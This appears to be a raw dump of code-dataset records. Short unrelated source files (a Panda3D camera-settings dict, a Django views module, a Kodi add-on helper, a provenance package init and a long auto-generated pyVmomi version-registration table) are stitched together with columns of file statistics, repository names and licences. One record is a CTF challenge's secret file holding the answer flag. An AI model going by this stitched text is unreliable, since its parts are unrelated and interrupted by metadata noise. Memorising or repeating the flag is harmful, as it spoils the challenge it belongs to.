extraInfo = {'camPos': Point3(-2.75214, 667.557, 25.8014),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371,'skyState': 2,'fog': 0,'cameraSettings': {'02': {'camPos': Point3(-20.116, 668.566, 26.6651),'camHpr': VBase3(-174.075, -16.8338, 0),'focalLength': 0.657999992371},'03': {'camPos': Point3(-20.535, 668.328, 26.1642),'camHpr': VBase3(176.439, -13.2293, 0),'focalLength': 0.657999992371},'01': {'camPos': Point3(-8.33837, 662.781, 28.5143),'camHpr': VBase3(173.506, -14.5511, 0),'focalLength': 0.657999992371},'06': {'camPos': Point3(-2.75214, 667.557, 25.8014),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371},'05': {'camPos': Point3(-3.76077, 668.398, 25.9153),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371},'3': {'camPos': Point3(-8.55837, 664.685, 26.5951),'camHpr': VBase3(176.439, -13.2293, 0),'focalLength': 0.657999992371}}}
| 63,211.666667
| 188,672
| 0.671358
| 26,823
| 189,635
| 4.656079
| 0.069232
| 0.021411
| 0.023421
| 0.021523
| 0.717015
| 0.567379
| 0.532685
| 0.501689
| 0.468284
| 0.432076
| 0
| 0.253741
| 0.049817
| 189,635
| 3
| 188,673
| 63,211.666667
| 0.439369
| 0
| 0
| 0
| 0
| 1.666667
| 0.564582
| 0.275401
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d6d1ba393ab2c81ba3aa528da1951896eab44b3c
| 184
|
py
|
Python
|
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def homepage( request ):
return render( request, 'Home/index.html' )
def blogpage( request ):
return render( request, 'Blog/index.html' )
| 23
| 47
| 0.711957
| 23
| 184
| 5.695652
| 0.608696
| 0.198473
| 0.290076
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 184
| 7
| 48
| 26.285714
| 0.861842
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d6f7535dfdd76b50e868d3c379c14e3b002caab6
| 141
|
py
|
Python
|
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
parser4life/tantrumrepo
|
3b37145f4772409e538cbddb0b7aa23be525772a
|
[
"Beerware"
] | 1
|
2021-05-09T19:55:51.000Z
|
2021-05-09T19:55:51.000Z
|
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
Reapercrew666/crypt
|
e1e0994f5323c6b454ac0f65fb2e579f7bea8e5a
|
[
"Beerware"
] | null | null | null |
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
Reapercrew666/crypt
|
e1e0994f5323c6b454ac0f65fb2e579f7bea8e5a
|
[
"Beerware"
] | 2
|
2020-04-01T22:11:12.000Z
|
2020-05-07T23:54:52.000Z
|
import resources.lib.utils as utils
def resource_filename(*args):
return utils.addon_dir() + "/resources/lib/dropbox/trusted-certs.crt"
| 28.2
| 73
| 0.765957
| 20
| 141
| 5.3
| 0.8
| 0.226415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 141
| 4
| 74
| 35.25
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0.283688
| 0.283688
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
ba30b0d5e69101600946b902428f5436af52fa9d
| 35
|
py
|
Python
|
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | 5
|
2019-10-04T07:20:37.000Z
|
2021-06-15T21:34:07.000Z
|
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
flag='HATS{3xp0n3n7_700_5m41l!!!}'
| 17.5
| 34
| 0.742857
| 5
| 35
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 0.028571
| 35
| 1
| 35
| 35
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0.771429
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba67b095cbbd210533cf5c8f5a348640da53fb77
| 307
|
py
|
Python
|
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | null | null | null |
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | null | null | null |
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | 1
|
2018-05-10T21:15:02.000Z
|
2018-05-10T21:15:02.000Z
|
from .provenance import platform_info
from .provenance import py_package_info
from .provenance import PkgDesc, PkgInfo, ProvenanceData, ProvenanceAccumulator
# from .provenance import check_dirty
# from .provenance import git_commit, git_dirty
# from .provenance import gather_provenance, check_provenance
| 38.375
| 79
| 0.846906
| 37
| 307
| 6.810811
| 0.432432
| 0.333333
| 0.47619
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107492
| 307
| 7
| 80
| 43.857143
| 0.919708
| 0.459283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bab7a54e3a6acfcc98bf074f945d3475b9fcb00c
| 358,811
|
py
|
Python
|
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
# ******* WARNING - AUTO GENERATED CODE - DO NOT EDIT *******
from .VmomiSupport import CreateDataType, CreateManagedType
from .VmomiSupport import CreateEnumType
from .VmomiSupport import AddVersion, AddVersionParent
from .VmomiSupport import AddBreakingChangesInfo
from .VmomiSupport import F_LINK, F_LINKABLE
from .VmomiSupport import F_OPTIONAL, F_SECRET
from .VmomiSupport import newestVersions, ltsVersions
from .VmomiSupport import dottedVersions, oldestVersions
AddVersion("vmodl.query.version.version4", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version3", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version2", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version1", "", "", 0, "vim25")
AddVersion("vim.version.pcieHotPlugOfFPT", "vim25", "f6468705F", 0, "vim25")
AddVersion("vim.version.pr1429825", "vim25", "f0225EA5D", 0, "vim25")
AddVersion("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim25", "fBA45B943", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_TELEMETRY", "dp", "f9EDDF787", 0, "dp")
AddVersion("vim.version.MemoryTiering", "vim25", "fEB88939B", 0, "vim25")
AddVersion("vim.version.v7_0_1_1", "vim25", "7.0.1.1", 0, "vim25")
AddVersion("vim.version.FCD_VRA_SUPPORT", "vim25", "f387D05F3", 0, "vim25")
AddVersion("vim.version.guestDetailedData", "vim25", "fDBF22688", 0, "vim25")
AddVersion("vim.version.SGX_MPA_VMCheck", "vim25", "f144AFCFC", 0, "vim25")
AddVersion("vim.version.vdcs", "vim25", "f2D223FDA", 0, "vim25")
AddVersion("vmodl.version.version0", "", "", 0, "vim25")
AddVersion("vim.version.NFS_VMKPORTBIND", "vim25", "f3E76F108", 0, "vim25")
AddVersion("vmodl.version.version1", "", "", 0, "vim25")
AddVersion("vmodl.version.version2", "", "", 0, "vim25")
AddVersion("dp.version.version1", "dp", "future", 0, "dp")
AddVersion("vim.version.v6_9_1", "vim25", "6.9.1", 0, "vim25")
AddVersion("vim.version.VMC_NFS_SUPPORT", "vim25", "fB9D6602F", 0, "vim25")
AddVersion("vim.version.NsxLiveUpdate", "vim25", "fB9D1B531", 0, "vim25")
AddVersion("vim.version.VDS_ReadOnlyDisk", "vim25", "fC9C35C17", 0, "vim25")
AddVersion("vim.version.v7_0_0_2", "vim25", "7.0.0.2", 0, "vim25")
AddVersion("vim.version.vVol_datastore_scalability", "vim25", "f16386A78", 0, "vim25")
AddVersion("vim.version.AssignHwCompositeDev", "vim25", "f38673F46", 0, "vim25")
AddVersion("vim.version.v6_8_7", "vim25", "6.8.7", 0, "vim25")
AddVersion("vmodl.reflect.version.version1", "reflect", "1.0", 0, "reflect")
AddVersion("vmodl.reflect.version.version2", "reflect", "2.0", 0, "reflect")
AddVersion("vim.version.v8_0_0_0", "vim25", "8.0.0.0", 0, "vim25")
AddVersion("vim.version.VQAT", "vim25", "f39AC0073", 0, "vim25")
AddVersion("vim.version.VCDP_NestedFilters", "vim25", "f6B273B70", 0, "vim25")
AddVersion("vim.version.nativeSnapshot", "vim25", "f627CD25E", 0, "vim25")
AddVersion("vim.version.hostProfiles", "vim25", "f19A23BEB", 0, "vim25")
AddVersion("vim.version.GraphicsDRS", "vim25", "fFF21E076", 0, "vim25")
AddVersion("vim.version.v7_0_3_1", "vim25", "7.0.3.1", 0, "vim25")
AddVersion("vim.version.v7_0_3_2", "vim25", "7.0.3.2", 0, "vim25")
AddVersion("vim.version.v7_0_3_0", "vim25", "7.0.3.0", 0, "vim25")
AddVersion("vim.version.hwh", "vim25", "f55E01367", 0, "vim25")
AddVersion("vim.version.version13", "vim25", "6.7.1", 0, "vim25")
AddVersion("vim.version.version14", "vim25", "6.7.2", 0, "vim25")
AddVersion("vim.version.version15", "vim25", "6.7.3", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "dp", "f6F7CDE54", 0, "dp")
AddVersion("vim.version.VSAN2_Configure", "vim25", "fB91B17FA", 0, "vim25")
AddVersion("vim.version.DRS_LB_REASONCODE", "vim25", "f0DCF3EE9", 0, "vim25")
AddVersion("vim.version.gosCrashRemediation", "vim25", "f41CA5C7B", 0, "vim25")
AddVersion("vim.version.VCSOF_173", "vim25", "fBAEF7A12", 0, "vim25")
AddVersion("vim.version.pciSriovExtendedID", "vim25", "fDC5D7D0B", 0, "vim25")
AddVersion("vim.version.vmxnet3UPT", "vim25", "fE5282C92", 0, "vim25")
AddVersion("vim.version.version10", "vim25", "6.0", 0, "vim25")
AddVersion("vim.version.version11", "vim25", "6.5", 0, "vim25")
AddVersion("vim.version.VMcrypt_IntegrityProtection", "vim25", "f90B801B2", 0, "vim25")
AddVersion("vim.version.version12", "vim25", "6.7", 0, "vim25")
AddVersion("vim.version.pciDeviceExt", "vim25", "fAC9F3B4D", 0, "vim25")
AddVersion("vim.version.toolsOffHost", "vim25", "f6790FE8D", 0, "vim25")
AddVersion("vim.version.hostCertificateManagement", "vim25", "f5AFFD144", 0, "vim25")
AddVersion("vim.version.vmMisc", "vim25", "fA5752719", 0, "vim25")
AddVersion("vim.version.VLCM_QuickLaunchPreload", "vim25", "fC7169CA8", 0, "vim25")
AddVersion("vim.version.LSI2PVSCSI", "vim25", "f75BC95F8", 0, "vim25")
AddVersion("vim.version.ProvisioningEventRefresh", "vim25", "fE54ABD5B", 0, "vim25")
AddVersion("vim.version.OVF_SINGLEDEPLOY_API", "vim25", "f55BDD0C7", 0, "vim25")
AddVersion("vim.version.v7_0_2_0", "vim25", "7.0.2.0", 0, "vim25")
AddVersion("vim.version.pr1803450", "vim25", "f9D6EE58D", 0, "vim25")
AddVersion("vim.version.v7_0_2_1", "vim25", "7.0.2.1", 0, "vim25")
AddVersion("vim.version.VMcrypt_OnlineVMEncryption", "vim25", "f4DF43A32", 0, "vim25")
AddVersion("vim.version.FT_VBS_SUPPORT", "vim25", "f52B55594", 0, "vim25")
AddVersion("vim.version.WCP_FaultDomains", "vim25", "f556A3D45", 0, "vim25")
AddVersion("vim.version.dnd", "vim25", "f2584E1FD", 0, "vim25")
AddVersion("vim.version.optional_virtual_disks", "vim25", "fAF52CE9B", 0, "vim25")
AddVersion("vim.version.hwh2_0", "vim25", "fBD5D595C", 0, "vim25")
AddVersion("vim.version.v7_0_1_0", "vim25", "7.0.1.0", 0, "vim25")
AddVersion("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim25", "f013EEA91", 0, "vim25")
AddVersion("vim.version.EventsOrdering", "vim25", "f4F3889C9", 0, "vim25")
AddVersion("vim.version.PMemV2", "vim25", "f6463FE0A", 0, "vim25")
AddVersion("vim.version.v7_0", "vim25", "7.0.0.0", 0, "vim25")
AddVersion("vim.version.FileLockInfo_GSS34", "vim25", "fD292327E", 0, "vim25")
AddVersion("vim.version.version8", "vim25", "5.1", 0, "vim25")
AddVersion("vim.version.version9", "vim25", "5.5", 0, "vim25")
AddVersion("vim.version.version6", "vim25", "4.1", 0, "vim25")
AddVersion("vim.version.version7", "vim25", "5.0", 0, "vim25")
AddVersion("vim.version.DiskGroupVMC", "vim25", "f025FA022", 0, "vim25")
AddVersion("vim.version.TrustAuthority_V4", "vim25", "f8EF75698", 0, "vim25")
AddVersion("vim.version.version1", "vim2", "2.0", 0, "vim25")
AddVersion("vim.version.version4", "vim25", "2.5u2server", 0, "vim25")
AddVersion("vim.version.version5", "vim25", "4.0", 0, "vim25")
AddVersion("vim.version.SRIOVValidNumVFs", "vim25", "fBE71A01E", 0, "vim25")
AddVersion("vim.version.version2", "vim25", "2.5", 0, "vim25")
AddVersion("vim.version.version3", "vim25", "2.5u2", 0, "vim25")
AddVersion("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim25", "fB702C2A8", 0, "vim25")
AddVersion("vim.version.VmxRebootPowerOff", "vim25", "f4F1633B4", 0, "vim25")
AddVersion("vim.version.ClusteredEsx_V1", "vim25", "f8B87BE62", 0, "vim25")
AddVersion("vim.version.fourKnStorageSupport", "vim25", "f25F1CD15", 0, "vim25")
AddVersion("vim.version.resetportstatistics", "vim25", "fEF47BD28", 0, "vim25")
AddVersion("vim.version.batchRenameSupport", "vim25", "f9263BFF0", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "dp", "f84E89611", 0, "dp")
AddVersion("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim25", "f098CF0D6", 0, "vim25")
AddVersion("dp.version.unstable", "dp", "uA4115CFF", 0, "dp")
AddVersion("vim.version.SGX_MPA_HostReg", "vim25", "f7E551A09", 0, "vim25")
AddVersion("vim.version.GreenMetrics", "vim25", "f705133F8", 0, "vim25")
AddVersion("vim.version.hostVendorSpecificStatus", "vim25", "f5E771E6E", 0, "vim25")
AddVersion("vim.version.VMcrypt_V4", "vim25", "fF1A2B578", 0, "vim25")
AddVersion("vim.version.hostAccessManager", "vim25", "f7C32A12F", 0, "vim25")
AddVersion("vim.version.ocmSupportedForReconfigure", "vim25", "fE3F755AA", 0, "vim25")
AddVersion("dp.version.v8_0_0_0", "dp", "8.0.0.0", 0, "dp")
AddVersion("vim.version.VirtualTopo", "vim25", "f2B5B6385", 0, "vim25")
AddVersion("vim.version.Tools_Update_Health", "vim25", "f0B55775B", 0, "vim25")
AddVersion("vim.version.CPU_Scheduler_Info", "vim25", "f7BEE87FE", 0, "vim25")
AddVersion("vim.version.VM_CLONE_REKEY_TPM", "vim25", "fB4A651E5", 0, "vim25")
AddVersion("vim.version.FCD_CATALOG_HEALTH", "vim25", "fE2C114DE", 0, "vim25")
AddVersion("vim.version.smartnic_vc", "vim25", "f4C11A1E3", 0, "vim25")
AddVersion("vim.version.HWv20", "vim25", "f4D570749", 0, "vim25")
AddVersion("vim.version.unstable", "vim25", "u19B10CDC", 0, "vim25")
AddVersion("dp.version.disabled", "dp", "", 0, "dp")
AddVersion("vim.version.FT_DRS_METRO_CLUSTER", "vim25", "f96BF4016", 0, "vim25")
AddVersion("vim.version.VSAN_DeltaCompEnsureDurability", "vim25", "f82125F47", 0, "vim25")
AddVersion("vim.version.bmcInfo", "vim25", "f34D7FD26", 0, "vim25")
AddVersion("vim.version.disabled", "vim25", "", 0, "vim25")
AddVersion("vim.version.vHT", "vim25", "f498DBC25", 0, "vim25")
AddVersion("vim.version.ClusterConfigManagerV2", "vim25", "fBEB8FA9C", 0, "vim25")
AddVersion("vim.version.smartnic_network", "vim25", "fA352E3B6", 0, "vim25")
AddVersion("vim.version.DVX", "vim25", "fD51B3F10", 0, "vim25")
AddVersion("vim.version.VmcExternalStorageSupport", "vim25", "fB3D1C7C3", 0, "vim25")
AddVersion("vim.version.PodVMOnVDS", "vim25", "f543724B3", 0, "vim25")
AddVersion("vim.version.ClusterConfigManagerTransition", "vim25", "f929779EA", 0, "vim25")
AddVersion("vim.version.LiveUpdate", "vim25", "fA0392DC2", 0, "vim25")
AddVersion("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim25", "f29A03B68", 0, "vim25")
AddVersion("vim.version.VMcrypt3_KeyCustomAttribute", "vim25", "f70051077", 0, "vim25")
AddVersion("vim.version.E2ENativeNVMeSupport", "vim25", "f9130356D", 0, "vim25")
AddVersion("vim.version.FCD_PERFORMANCE", "vim25", "f5C1C764A", 0, "vim25")
AddVersion("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim25", "f45FBF959", 0, "vim25")
AddVersion("vim.version.nsx_uens_u2", "vim25", "f44FF8D6E", 0, "vim25")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version4")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version3")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version2")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version3")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version3", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version3", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version2", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version2", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version1", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version1", "vmodl.version.version0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version4")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version3")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v6_9_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v6_8_7")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version13")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version14")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version15")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version10")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version11")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version12")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version8")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version9")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version6")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version7")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version4")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version5")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version3")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version4")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version3")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version2")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version1")
AddVersionParent("vim.version.pr1429825", "vim.version.pr1429825")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version0")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version1")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.v6_9_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pr1429825", "vim.version.v6_8_7")
AddVersionParent("vim.version.pr1429825", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pr1429825", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pr1429825", "vim.version.version13")
AddVersionParent("vim.version.pr1429825", "vim.version.version14")
AddVersionParent("vim.version.pr1429825", "vim.version.version15")
AddVersionParent("vim.version.pr1429825", "vim.version.version10")
AddVersionParent("vim.version.pr1429825", "vim.version.version11")
AddVersionParent("vim.version.pr1429825", "vim.version.version12")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0")
AddVersionParent("vim.version.pr1429825", "vim.version.version8")
AddVersionParent("vim.version.pr1429825", "vim.version.version9")
AddVersionParent("vim.version.pr1429825", "vim.version.version6")
AddVersionParent("vim.version.pr1429825", "vim.version.version7")
AddVersionParent("vim.version.pr1429825", "vim.version.version1")
AddVersionParent("vim.version.pr1429825", "vim.version.version4")
AddVersionParent("vim.version.pr1429825", "vim.version.version5")
AddVersionParent("vim.version.pr1429825", "vim.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.version3")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version4")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version3")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_9_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_8_7")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version13")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version14")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version15")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version10")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version11")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version12")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version8")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version9")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version6")
